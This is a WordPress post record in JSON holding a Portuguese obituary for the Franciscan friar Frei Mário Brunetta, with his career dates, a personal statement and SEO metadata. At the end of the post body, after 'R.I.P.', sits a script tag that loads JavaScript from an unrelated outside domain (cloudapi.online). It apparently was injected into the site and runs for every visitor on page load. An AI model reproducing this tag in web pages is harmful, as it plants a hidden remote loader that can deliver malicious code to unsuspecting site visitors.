{"id":188723,"date":"2018-08-31T14:55:19","date_gmt":"2018-08-31T17:55:19","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=170519"},"modified":"2019-01-02T11:17:19","modified_gmt":"2019-01-02T13:17:19","slug":"aos-80-anos-falece-frei-mario-brunetta-2","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/aos-80-anos-falece-frei-mario-brunetta-2.html","title":{"rendered":"Aos 80 anos, falece o &#8220;professor&#8221; Frei M\u00e1rio Brunetta"},"content":{"rendered":"<p><img loading=\"lazy\" class=\"alignleft wp-image-170521\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/08\/brunetta_300818_1.jpg\" alt=\"brunetta_300818_1\" width=\"418\" height=\"588\" \/><\/p>\n<h3>* 19\/10\/1937 + 30\/08\/2018<\/h3>\n<hr \/>\n<p>Nosso confrade Frei M\u00e1rio Brunetta faleceu na tarde de hoje (30\/08), \u00e0s 13h45, no Hospital da USF, em Bragan\u00e7a Paulista. No e-mail de quinta-feira passada (23\/08), o guardi\u00e3o Frei Carlos K\u00f6rber comunicava que Frei M\u00e1rio havia sido internado na UTI, no dia 21, devido a uma pneumonia. Desde 2014, Frei M\u00e1rio vinha sendo cuidado na Fraternidade de Bragan\u00e7a Paulista, devido \u00e0s suas condi\u00e7\u00f5es de sa\u00fade n\u00e3o favor\u00e1veis.<br \/>\nO sepultamento do corpo de Frei M\u00e1rio se deu\u00a0 ap\u00f3s a Missa de Ex\u00e9quias, \u00e0s 11 horas da sexta-feira, 31 de agosto, no Cemit\u00e9rio do Sant\u00edssimo Sacramento, em S\u00e3o Paulo.<\/p>\n<h3>Dados pessoais, forma\u00e7\u00e3o e atividades<\/h3>\n<p>&#8211; <strong>Nascimento:<\/strong> 19.10.1937 (80 anos de idade)<br \/>\n&#8211; <strong>Natural<\/strong> de Ibicar\u00e9, SC.<br \/>\n&#8211; <strong>Vesti\u00e7\u00e3o:<\/strong> 19.12.1959 &#8211; Rodeio<br \/>\n&#8211; <strong>Primeira Profiss\u00e3o:<\/strong> 20.12.1960 (57 anos de Vida Franciscana)<br \/>\n&#8211;<strong> Profiss\u00e3o Solene:<\/strong> 01.02.1964<br \/>\n&#8211; <strong>Ordena\u00e7\u00e3o Presbiteral:<\/strong> 15\/12\/1965 (52 anos de Sacerd\u00f3cio)<br \/>\n&#8211; <strong>1961 \u2013 1962<\/strong> \u2013 Curitiba \u2013 estudos de Filosofia;<br \/>\n&#8211; <strong>1963 \u2013 1966<\/strong> \u2013 Petr\u00f3polis \u2013 estudos de Teologia;<br \/>\n&#8211;<strong> 17.12.1966<\/strong> \u2013 Rio Negro &#8211; Professor no gin\u00e1sio dos Irm\u00e3os;<br \/>\n&#8211;<strong> 20.03.1971<\/strong> \u2013 Curitiba \u2013 atendimento e estudos de Biologia;<br \/>\n&#8211; <strong>11.03.1974<\/strong> \u2013 Agudos &#8211; professor;<br \/>\n&#8211; <strong>20.08.2000<\/strong> \u2013 1\u00ba p\u00e1roco da Par\u00f3quia Santo Ant\u00f4nio, em Agudos.<br \/>\n&#8211; <strong>07.11.2003 \u2013<\/strong> Professor e vig\u00e1rio paroquial;<br \/>\n&#8211; <strong>17.12.2009<\/strong> \u2013 tratamento de sa\u00fade;<br \/>\n&#8211;<strong> 27.11.2014<\/strong> \u2013 Bragan\u00e7a Paulista \u2013 tratamento de sa\u00fade;<\/p>\n<h3>O frade menor<\/h3>\n<p>No livreto comemorativo da instala\u00e7\u00e3o da Par\u00f3quia Santo Ant\u00f4nio, em Agudos, em 2000, Frei M\u00e1rio, ao final, faz uma apresenta\u00e7\u00e3o pessoal e diz o que segue:<br \/>\n\u201cSou de Santa Catarina, nascido em Ibicar\u00e9, neto de italianos, que entraram no Rio Grande do Sul. Fam\u00edlia numerosa (12 irm\u00e3os), cat\u00f3lica por heran\u00e7a e por convic\u00e7\u00e3o. Desde uns 7 ou 8 anos tive forte inclina\u00e7\u00e3o, que convenciono cham\u00e1-la de voca\u00e7\u00e3o, de dedicar minha vida ao sagrado (voca\u00e7\u00e3o religiosa) N\u00e3o poderia explicar em poucas palavras o que era isto, nem penso que seja importante. O importante \u00e9 que procurei seguir a \u201cinspira\u00e7\u00e3o\u201d.<\/p>\n<p>Aos 13 anos \u00e9 que me matriculei no semin\u00e1rio, sem saber exatamente se o que seguiria era a voca\u00e7\u00e3o sacerdotal. Assim mesmo, com a idade de 21 anos, ap\u00f3s estudos, tentes com o Orientador (n\u00f3s cham\u00e1vamos de mestre), expressar que desejava ser irm\u00e3o leigo. O mestre, ap\u00f3s longa conversa, me convenceu a aceitar a vida sacerdotal. Completei os estudos de Filosofia e Teologia em 6 anos.<br \/>\nSempre tive uma \u201ccompuls\u00e3o\u201d de ler muito e refletir. Muita coisa assimilei, hist\u00f3ria, filosofias, culturas. Ao me ordenar me indicaram tarefa de professor de primeiro grau.<\/p>\n<p>Ao ser convidado a lecionar no segundo grau, pedi para fazer um curso. Aconselharam-me cursar a Faculdade. Escolhi Ci\u00eancias Naturais e licenciei-me em Biologia, Qu\u00edmica e Matem\u00e1tica para dar aulas. Uma vez que tinha forte atra\u00e7\u00e3o pela natureza, de acordo com nossa forma\u00e7\u00e3o franciscana, dediquei-me mais \u00e0 Biologia. Mas tudo o que se refere \u00e0s Ci\u00eancias Naturais \u00e9 minha atra\u00e7\u00e3o.<br \/>\nAs Ci\u00eancias Humanas foram objeto particular de meu enfoque nos estudos. Mas sempre olhei o mundo e o homem sob o \u00e2ngulo do sagrado. (&#8230;)<\/p>\n<p>Nunca tive dissabores consider\u00e1veis. Estou de bem com a vida e com o mundo. Amo meu trabalho e aos meus familiares, a quem muito e muito devo.<\/p>\n<p>Se me indicaram como administrador paroquial, provavelmente, \u00e9 porque acham que posso desempenhar razoavelmente este encargo. Agrade\u00e7o a confian\u00e7a e \u201cp\u00e9 na t\u00e1bua\u201d. Pe\u00e7o compreens\u00e3o e ajuda fraterna, e aux\u00edlio de Deus para poder corresponder.\u00a0 Deus os aben\u00e7oe. Am\u00e9m!\u201d<\/p>\n<p>Nosso confrade M\u00e1rio, encantado pela vida (bi\u00f3s), pela terra e seus segredos, nos deixou um legado de simplicidade e desapego. N\u00e3o era dado a requinte algum&#8230; a n\u00e3o ser ao de sua alma boa. Acolhido pelo Senhor, possa ele interceder por n\u00f3s.<\/p>\n<p><strong>R.I.P.<\/strong><br \/>\n<script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Falecimento<\/p>\n","protected":false},"author":1,"featured_media":193440,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[1160],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Aos 80 anos, falece o &quot;professor&quot; Frei M\u00e1rio Brunetta - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/aos-80-anos-falece-frei-mario-brunetta-2.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Aos 80 anos, falece o &quot;professor&quot; Frei M\u00e1rio Brunetta - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Falecimento\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/aos-80-anos-falece-frei-mario-brunetta-2.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-08-31T17:55:19+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-01-02T13:17:19+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/08\/brunetta_300818d.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/aos-80-anos-falece-frei-mario-brunetta-2.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/08\/brunetta_300818d.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/08\/brunetta_300818d.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/aos-80-anos-falece-frei-mario-brunetta-2.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/aos-80-anos-falece-frei-mario-brunetta-2.html\",\"name\":\"Aos 80 anos, falece o \\\"professor\\\" Frei M\u00e1rio Brunetta - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/aos-80-anos-falece-frei-mario-brunetta-2.html#primaryimage\"},\"datePublished\":\"2018-08-31T17:55:19+00:00\",\"dateModified\":\"2019-01-02T13:17:19+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/aos-80-anos-falece-frei-mario-brunetta-2.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/aos-80-anos-falece-frei-mario-brunetta-2.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/aos-80-anos-falece-frei-mario-brunetta-2.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Aos 80 anos, falece o &#8220;professor&#8221; Frei M\u00e1rio Brunetta\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Aos 80 anos, falece o \"professor\" Frei M\u00e1rio Brunetta - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/aos-80-anos-falece-frei-mario-brunetta-2.html","og_locale":"pt_BR","og_type":"article","og_title":"Aos 80 anos, falece o \"professor\" Frei M\u00e1rio Brunetta - Not\u00edcias - Franciscanos","og_description":"Falecimento","og_url":"https:\/\/franciscanos.org.br\/noticias\/aos-80-anos-falece-frei-mario-brunetta-2.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-08-31T17:55:19+00:00","article_modified_time":"2019-01-02T13:17:19+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/08\/brunetta_300818d.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/aos-80-anos-falece-frei-mario-brunetta-2.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/08\/brunetta_300818d.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/08\/brunetta_300818d.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/aos-80-anos-falece-frei-mario-brunetta-2.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/aos-80-anos-falece-frei-mario-brunetta-2.html","name":"Aos 80 anos, falece o \"professor\" Frei M\u00e1rio Brunetta - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/aos-80-anos-falece-frei-mario-brunetta-2.html#primaryimage"},"datePublished":"2018-08-31T17:55:19+00:00","dateModified":"2019-01-02T13:17:19+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/aos-80-anos-falece-frei-mario-brunetta-2.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/aos-80-anos-falece-frei-mario-brunetta-2.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/aos-80-anos-falece-frei-mario-brunetta-2.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Aos 80 anos, falece o &#8220;professor&#8221; Frei M\u00e1rio Brunetta"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/188723"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=188723"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/188723\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/193440"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=188723"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=188723"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=188723"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}